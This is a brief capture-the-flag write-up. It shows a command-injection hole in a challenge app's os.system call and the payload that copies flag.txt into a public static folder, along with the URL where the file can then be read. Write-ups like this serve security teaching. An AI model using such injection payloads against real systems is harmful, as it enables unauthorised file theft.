Rating:
- we can command injection app.py line:24
> os.system(f"python3 generate.py {filename} \"{text}\"")
- we can input command in {text}
### input
> test $(cp ../flag.txt static/images/test.txt)
### access
> http://193.57.159.27:51768/static/images/test.txt
>
> you can get flag here
